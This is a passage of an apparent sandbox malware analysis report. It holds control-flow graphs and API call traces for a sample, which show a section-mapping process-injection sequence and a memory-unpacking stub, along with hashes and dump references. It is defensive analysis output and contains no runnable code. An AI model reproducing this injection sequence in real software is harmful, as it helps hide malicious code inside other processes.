4084->4086 4087 40216e 4084->4087 4085->4084 4085->4086 4086->4085 4087->4078 4089 401913 4088->4089 4090 401946 Sleep 4089->4090 4091 401961 4090->4091 4093 401972 4091->4093 4094 401529 4091->4094 4093->4082 4095 401539 4094->4095 4096 4015d5 NtDuplicateObject 4095->4096 4103 4016f1 4095->4103 4097 4015f2 NtCreateSection 4096->4097 4096->4103 4098 401672 NtCreateSection 4097->4098 4099 401618 NtMapViewOfSection 4097->4099 4101 40169e 4098->4101 4098->4103 4099->4098 4100 40163b NtMapViewOfSection 4099->4100 4100->4098 4102 401659 4100->4102 4101->4103 4104 4016a8 NtMapViewOfSection 4101->4104 4102->4098 4103->4093 4104->4103 4105 4016cf NtMapViewOfSection 4104->4105 4105->4103 4130 4020fc 4131 402107 4130->4131 4132 402152 NtQuerySystemInformation 4131->4132 4133 40216e 4131->4133 4132->4131

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 418a70-418a98 2 418aa0-418aa7 0->2 3 418ad4-418ada 2->3 4 418aa9-418ad0 2->4 5 418adc-418ae8 3->5 6 418aee-418af8 3->6 4->3 5->6 7 418b33-418b3a 6->7 8 418afa-418b29 6->8 7->2 9 418b40-418b46 7->9 8->7 11 418b48-418b4e 9->11 12 418b50-418b56 11->12 13 418b5c-418b66 11->13 12->13 14 418b68 13->14 15 418b6a-418b71 13->15 14->15 15->11 16 418b73-418b7a 15->16 17 418b80-418c96 InterlockedCompareExchange GetFocus ReadConsoleA FindAtomA SearchPathA SetConsoleMode SearchPathW GetDefaultCommConfigA CopyFileExW CreatePipe GetEnvironmentStringsW WriteConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 16->17 18 418cc6-418cd2 16->18 21 418ca4-418cab 17->21 22 418c98-418c9e ObjectPrivilegeAuditAlarmW 17->22 19 418cd4-418ce2 SetCommState 18->19 24 418ce4-418ceb 19->24 25 418ced-418cf4 19->25 26 418cb5-418cc3 21->26 27 418cad-418caf WaitForSingleObject 21->27 22->21 24->19 24->25 28 418daa-418db9 call 418740 25->28 29 418cfa-418da4 GetConsoleAliasesLengthW GetComputerNameA CopyFileW GetFileAttributesA GetConsoleAliasExesLengthW GetBinaryType FormatMessageA GetLongPathNameA PurgeComm 25->29 26->18 27->26 34 418dbb-418dcc 28->34 35 418ded-418df8 LoadLibraryA call 418770 28->35 29->28 37 418dd0-418de0 34->37 42 418dfd-418e0e call 4189d0 35->42 40 418de2 37->40 41 418de8-418deb 37->41 40->41 41->35 41->37 46 418e10-418e17 42->46 48 418e19-418e27 MoveFileW 46->48 49 418e2d-418e33 46->49 48->49 50 418e35 call 418760 49->50 51 418e3a-418e41 49->51 50->51 54 418e43-418e4e InterlockedCompareExchange 51->54 55 418e54-418e5b 51->55 54->55 55->46 57 418e5d-418e6d 55->57 58 418e70-418e80 57->58 60 418e82 58->60 61 418e89-418e8c 58->61 60->61 61->58 62 418e8e-418e99 61->62 63 418ea0-418ea5 62->63 64 418ea7-418ead 63->64 65 418eaf-418eb5 63->65 64->65 66 418eb7-418ec4 64->66 65->63 65->66
                                                                                                                                APIs
                                                                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418B8B
                                                                                                                                • GetFocus.USER32 ref: 00418B91
                                                                                                                                • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418B9E
                                                                                                                                • FindAtomA.KERNEL32(00000000), ref: 00418BA5
                                                                                                                                • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BBD
                                                                                                                                • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00418BC5
                                                                                                                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BDD
                                                                                                                                • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418C04
                                                                                                                                • CopyFileExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C10
                                                                                                                                • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418C26
                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00418C2C
                                                                                                                                • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418C71
                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00418C80
                                                                                                                                • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418C89
                                                                                                                                • ObjectPrivilegeAuditAlarmW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C9E
                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418CAF
                                                                                                                                • SetCommState.KERNELBASE(00000000,00000000), ref: 00418CD8
                                                                                                                                • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00418D09
                                                                                                                                • GetComputerNameA.KERNEL32(?,?), ref: 00418D1D
                                                                                                                                • CopyFileW.KERNEL32(0041A3AC,0041A380,00000000), ref: 00418D2E
                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00418D35
                                                                                                                                • GetConsoleAliasExesLengthW.KERNEL32 ref: 00418D3B
                                                                                                                                • GetBinaryType.KERNEL32(0041A3C8,?), ref: 00418D4D
                                                                                                                                • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00418D60
                                                                                                                                • GetLongPathNameA.KERNEL32(0041A3E4,?,00000000), ref: 00418D73
                                                                                                                                • PurgeComm.KERNEL32(00000000,00000000), ref: 00418D7B
                                                                                                                                • LoadLibraryA.KERNELBASE(0041A3EC), ref: 00418DF2
                                                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00418E27
                                                                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418E4E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2270442778.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_40b000_fbhbvci.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ConsoleFile$CommNamePath$CompareCopyExchangeInterlockedLengthObjectSearch$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryComputerConfigCreateDefaultEnvironmentExesFindFocusFormatLibraryLoadLongMessageModeModuleMoveOutputPipePrivilegePurgeReadSingleStateStringsSystemTimeTypeWaitWrite
                                                                                                                                • String ID: k`$}$
                                                                                                                                • API String ID: 2220722107-956986773
                                                                                                                                • Opcode ID: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
                                                                                                                                • Instruction ID: 0c0e40555d578e92a9f225f047ccd42c64e3c90cdaccad76b264c498dc6ec0a1
                                                                                                                                • Opcode Fuzzy Hash: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
                                                                                                                                • Instruction Fuzzy Hash: 9FB1A0B1901224ABCB219B65EC58EDF7B78EF49350F00816EF649A3150DB785EC4CFA9

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 68 4014db-4014e7 69 401486-40148b 68->69 70 4014e9 68->70 71 401550-401569 70->71 72 4014eb 70->72 77 40155d-40156c call 4011a4 71->77 73 40155a 72->73 74 4014ed-4014fb 72->74 73->77 80 40149a-4014a8 74->80 81 4014fd-4014ff 74->81 84 40156e-40157f 77->84 89 4014c1-4014c8 80->89 83 401501 81->83 81->84 87 401504-401518 83->87 88 40148f 83->88 85 401581 84->85 86 401584-401589 84->86 85->86 98 4018a6-4018ae 86->98 99 40158f-4015a0 86->99 87->89 92 40151a 87->92 88->80 90 401469-401485 call 4011a4 89->90 91 4014ca 89->91 90->69 91->68 95 401539-401555 92->95 96 40151c-401526 92->96 95->71 98->86 106 4018a4-4018b3 99->106 107 4015a6-4015cf 99->107 110 4018c8 106->110 111 4018b9-4018c4 106->111 107->106 115 4015d5-4015ec NtDuplicateObject 107->115 110->111 112 4018cb-4018ff call 4011a4 110->112 111->112 115->106 117 4015f2-401616 NtCreateSection 115->117 119 401672-401698 NtCreateSection 117->119 120 401618-401639 NtMapViewOfSection 117->120 119->106 124 40169e-4016a2 119->124 120->119 122 40163b-401657 NtMapViewOfSection 120->122 122->119 125 401659-40166f 122->125 124->106 127 4016a8-4016c9 NtMapViewOfSection 124->127 125->119 127->106 129 4016cf-4016eb NtMapViewOfSection 127->129 129->106 132 4016f1 call 4016f6 129->132
                                                                                                                                APIs
                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2270420789.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_fbhbvci.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Section$CreateDuplicateObjectView
                                                                                                                                • String ID: 1
                                                                                                                                • API String ID: 1652636561-2212294583
                                                                                                                                • Opcode ID: a3d0a89ba2f0946d3c73b933561f00ce793550d5be3e53aacc3d784ec313288b
                                                                                                                                • Instruction ID: 7f4d7c4657737381e02ab4131f106e217a3bc84f51a1891dc43a423f49ad99c1
                                                                                                                                • Opcode Fuzzy Hash: a3d0a89ba2f0946d3c73b933561f00ce793550d5be3e53aacc3d784ec313288b
                                                                                                                                • Instruction Fuzzy Hash: 14718D71A00205FFEB209F91CC49FEF7BB8EF85B10F14412AF912BA2E5D6759905CA58

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 219 401529-401532 220 401543 219->220 221 401539-40153f 219->221 220->221 222 401546-40157f call 4011a4 220->222 221->222 232 401581 222->232 233 401584-401589 222->233 232->233 235 4018a6-4018ae 233->235 236 40158f-4015a0 233->236 235->233 239 4018a4-4018b3 236->239 240 4015a6-4015cf 236->240 243 4018c8 239->243 244 4018b9-4018c4 239->244 240->239 248 4015d5-4015ec NtDuplicateObject 240->248 243->244 245 4018cb-4018ff call 4011a4 243->245 244->245 248->239 250 4015f2-401616 NtCreateSection 248->250 252 401672-401698 NtCreateSection 250->252 253 401618-401639 NtMapViewOfSection 250->253 252->239 257 40169e-4016a2 252->257 253->252 255 40163b-401657 NtMapViewOfSection 253->255 255->252 258 401659-40166f 255->258 257->239 260 4016a8-4016c9 NtMapViewOfSection 257->260 258->252 260->239 262 4016cf-4016eb NtMapViewOfSection 260->262 262->239 265 4016f1 call 4016f6 262->265
                                                                                                                                APIs
                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2270420789.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_fbhbvci.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                • Opcode ID: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                                                                                                                                • Instruction ID: 138ec7ca1e8744eb65f40bd9736a53a73cefe8eecd72c79945fcbf62a21b6401
                                                                                                                                • Opcode Fuzzy Hash: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                                                                                                                                • Instruction Fuzzy Hash: D9616E71900205FBEB209F95DC49FEB7BB8FF81B00F14412AFA12BA1E4D6749A05DB65

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 267 401534-40157f call 4011a4 278 401581 267->278 279 401584-401589 267->279 278->279 281 4018a6-4018ae 279->281 282 40158f-4015a0 279->282 281->279 285 4018a4-4018b3 282->285 286 4015a6-4015cf 282->286 289 4018c8 285->289 290 4018b9-4018c4 285->290 286->285 294 4015d5-4015ec NtDuplicateObject 286->294 289->290 291 4018cb-4018ff call 4011a4 289->291 290->291 294->285 296 4015f2-401616 NtCreateSection 294->296 298 401672-401698 NtCreateSection 296->298 299 401618-401639 NtMapViewOfSection 296->299 298->285 303 40169e-4016a2 298->303 299->298 301 40163b-401657 NtMapViewOfSection 299->301 301->298 304 401659-40166f 301->304 303->285 306 4016a8-4016c9 NtMapViewOfSection 303->306 304->298 306->285 308 4016cf-4016eb NtMapViewOfSection 306->308 308->285 311 4016f1 call 4016f6 308->311
                                                                                                                                APIs
                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2270420789.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_fbhbvci.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                • Opcode ID: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                                                                                                                                • Instruction ID: 46ca3ae5353e1b2bf85c7e7487c0bf4a09c0837efea8bedcf4105f5ea6450319
                                                                                                                                • Opcode Fuzzy Hash: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                                                                                                                                • Instruction Fuzzy Hash: 81512971900245BFEF209F91CC48FEB7BB8EF85B00F14416AF912BA1A5D6749945CB24

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 313 401541-401543 315 401546-40157f call 4011a4 313->315 316 401539-40153f 313->316 326 401581 315->326 327 401584-401589 315->327 316->315 326->327 329 4018a6-4018ae 327->329 330 40158f-4015a0 327->330 329->327 333 4018a4-4018b3 330->333 334 4015a6-4015cf 330->334 337 4018c8 333->337 338 4018b9-4018c4 333->338 334->333 342 4015d5-4015ec NtDuplicateObject 334->342 337->338 339 4018cb-4018ff call 4011a4 337->339 338->339 342->333 344 4015f2-401616 NtCreateSection 342->344 346 401672-401698 NtCreateSection 344->346 347 401618-401639 NtMapViewOfSection 344->347 346->333 351 40169e-4016a2 346->351 347->346 349 40163b-401657 NtMapViewOfSection 347->349 349->346 352 401659-40166f 349->352 351->333 354 4016a8-4016c9 NtMapViewOfSection 351->354 352->346 354->333 356 4016cf-4016eb NtMapViewOfSection 354->356 356->333 359 4016f1 call 4016f6 356->359
                                                                                                                                APIs
                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2270420789.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_fbhbvci.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                • Opcode ID: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                                                                • Instruction ID: 68c08b8250816e380b35483fe5a52fcf5a4ffa7bf922b91d474b11e8be87ed95
                                                                                                                                • Opcode Fuzzy Hash: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                                                                • Instruction Fuzzy Hash: 99512AB1900205BFEF209F95CC48FEB7BB8EF85B10F14412AFA12BA1E5D6749945CB24

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 361 401545-40157f call 4011a4 369 401581 361->369 370 401584-401589 361->370 369->370 372 4018a6-4018ae 370->372 373 40158f-4015a0 370->373 372->370 376 4018a4-4018b3 373->376 377 4015a6-4015cf 373->377 380 4018c8 376->380 381 4018b9-4018c4 376->381 377->376 385 4015d5-4015ec NtDuplicateObject 377->385 380->381 382 4018cb-4018ff call 4011a4 380->382 381->382 385->376 387 4015f2-401616 NtCreateSection 385->387 389 401672-401698 NtCreateSection 387->389 390 401618-401639 NtMapViewOfSection 387->390 389->376 394 40169e-4016a2 389->394 390->389 392 40163b-401657 NtMapViewOfSection 390->392 392->389 395 401659-40166f 392->395 394->376 397 4016a8-4016c9 NtMapViewOfSection 394->397 395->389 397->376 399 4016cf-4016eb NtMapViewOfSection 397->399 399->376 402 4016f1 call 4016f6 399->402
                                                                                                                                APIs
                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2270420789.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_fbhbvci.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                • Opcode ID: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                                                                                                                                • Instruction ID: b5c9534ba5f5358dff2a074a80b826bd55324152c05987841a878028393b6fdb
                                                                                                                                • Opcode Fuzzy Hash: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                                                                                                                                • Instruction Fuzzy Hash: 94513AB1900245BFEF209F95CC48FEF7BB8EF85B00F14415AF911BA2A5D6749945CB24

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 404 401553-40157f call 4011a4 411 401581 404->411 412 401584-401589 404->412 411->412 414 4018a6-4018ae 412->414 415 40158f-4015a0 412->415 414->412 418 4018a4-4018b3 415->418 419 4015a6-4015cf 415->419 422 4018c8 418->422 423 4018b9-4018c4 418->423 419->418 427 4015d5-4015ec NtDuplicateObject 419->427 422->423 424 4018cb-4018ff call 4011a4 422->424 423->424 427->418 429 4015f2-401616 NtCreateSection 427->429 431 401672-401698 NtCreateSection 429->431 432 401618-401639 NtMapViewOfSection 429->432 431->418 436 40169e-4016a2 431->436 432->431 434 40163b-401657 NtMapViewOfSection 432->434 434->431 437 401659-40166f 434->437 436->418 439 4016a8-4016c9 NtMapViewOfSection 436->439 437->431 439->418 441 4016cf-4016eb NtMapViewOfSection 439->441 441->418 444 4016f1 call 4016f6 441->444
                                                                                                                                APIs
                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2270420789.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_fbhbvci.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                • Opcode ID: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                                                                                                                                • Instruction ID: 8d6641cc39e0a23de402a6cd7af9a8bcce9404ceaedab19c941a5a8b34b5f284
                                                                                                                                • Opcode Fuzzy Hash: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                                                                                                                                • Instruction Fuzzy Hash: 8C5119B1900205BFEF209F95CC48FEFBBB8EF85B00F14411AFA11AA2A5D6759945CB24

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 447 402ffa-40301e 448 403024-40303c 447->448 449 40313d-403142 447->449 448->449 450 403042-403053 448->450 451 403055-40305e 450->451 452 403063-403071 451->452 452->452 453 403073-40307a 452->453 454 40309c-4030a3 453->454 455 40307c-40309b 453->455 456 4030c5-4030c8 454->456 457 4030a5-4030c4 454->457 455->454 458 4030d1 456->458 459 4030ca-4030cd 456->459 457->456 458->451 461 4030d3-4030d8 458->461 459->458 460 4030cf 459->460 460->461 461->449 462 4030da-4030dd 461->462 462->449 463 4030df-40313a RtlCreateUserThread NtTerminateProcess 462->463 463->449
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2270420789.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_fbhbvci.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateProcessTerminateThreadUser
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1921587553-0
                                                                                                                                • Opcode ID: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                                                                                                                                • Instruction ID: 67905ead67b615cb9fd2ac39997d468ff33d28dd355ca5d175fe45067cf906e9
                                                                                                                                • Opcode Fuzzy Hash: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                                                                                                                                • Instruction Fuzzy Hash: 8B414732618E0C4FD778EE6CA88966377D5E798351B1643AAD809D3389EE30D85183C5

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 134 7b003c-7b0047 135 7b0049 134->135 136 7b004c-7b0263 call 7b0a3f call 7b0e0f call 7b0d90 VirtualAlloc 134->136 135->136 151 7b028b-7b0292 136->151 152 7b0265-7b0289 call 7b0a69 136->152 154 7b02a1-7b02b0 151->154 156 7b02ce-7b03c2 VirtualProtect call 7b0cce call 7b0ce7 152->156 154->156 157 7b02b2-7b02cc 154->157 163 7b03d1-7b03e0 156->163 157->154 164 7b0439-7b04b8 VirtualFree 163->164 165 7b03e2-7b0437 call 7b0ce7 163->165 167 7b04be-7b04cd 164->167 168 7b05f4-7b05fe 164->168 165->163 170 7b04d3-7b04dd 167->170 171 7b077f-7b0789 168->171 172 7b0604-7b060d 168->172 170->168 174 7b04e3-7b0505 170->174 175 7b078b-7b07a3 171->175 176 7b07a6-7b07b0 171->176 172->171 177 7b0613-7b0637 172->177 186 7b0517-7b0520 174->186 187 7b0507-7b0515 174->187 175->176 178 7b086e-7b08be LoadLibraryA 176->178 179 7b07b6-7b07cb 176->179 180 7b063e-7b0648 177->180 185 7b08c7-7b08f9 178->185 182 7b07d2-7b07d5 179->182 180->171 183 7b064e-7b065a 180->183 188 7b07d7-7b07e0 182->188 189 7b0824-7b0833 182->189 183->171 184 7b0660-7b066a 183->184 190 7b067a-7b0689 184->190 192 7b08fb-7b0901 185->192 193 7b0902-7b091d 185->193 194 7b0526-7b0547 186->194 187->194 195 7b07e2 188->195 196 7b07e4-7b0822 188->196 191 7b0839-7b083c 189->191 197 7b068f-7b06b2 190->197 198 7b0750-7b077a 190->198 191->178 199 7b083e-7b0847 191->199 192->193 200 7b054d-7b0550 194->200 195->189 196->182 203 7b06ef-7b06fc 197->203 204 7b06b4-7b06ed 197->204 198->180 205 7b084b-7b086c 199->205 206 7b0849 199->206 201 7b05e0-7b05ef 200->201 202 7b0556-7b056b 200->202 201->170 208 7b056f-7b057a 202->208 209 7b056d 202->209 210 7b074b 203->210 211 7b06fe-7b0748 203->211 204->203 205->191 206->178 212 7b059b-7b05bb 208->212 213 7b057c-7b0599 208->213 209->201 210->190 211->210 218 7b05bd-7b05db 212->218 213->218 218->200
                                                                                                                                APIs
                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 007B024D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2270658140.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_7b0000_fbhbvci.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID: cess$kernel32.dll
                                                                                                                                • API String ID: 4275171209-1230238691
                                                                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                • Instruction ID: 5b83b1d6e075be0e62862089d7e5f4325240138de161d0a465d2f8f56dc3ee68
                                                                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                • Instruction Fuzzy Hash: E2527874A00229DFDB64CF68C984BADBBB1BF09304F1480D9E90DAB251DB34AE94DF54

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 446 418770-4188b0 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                                APIs
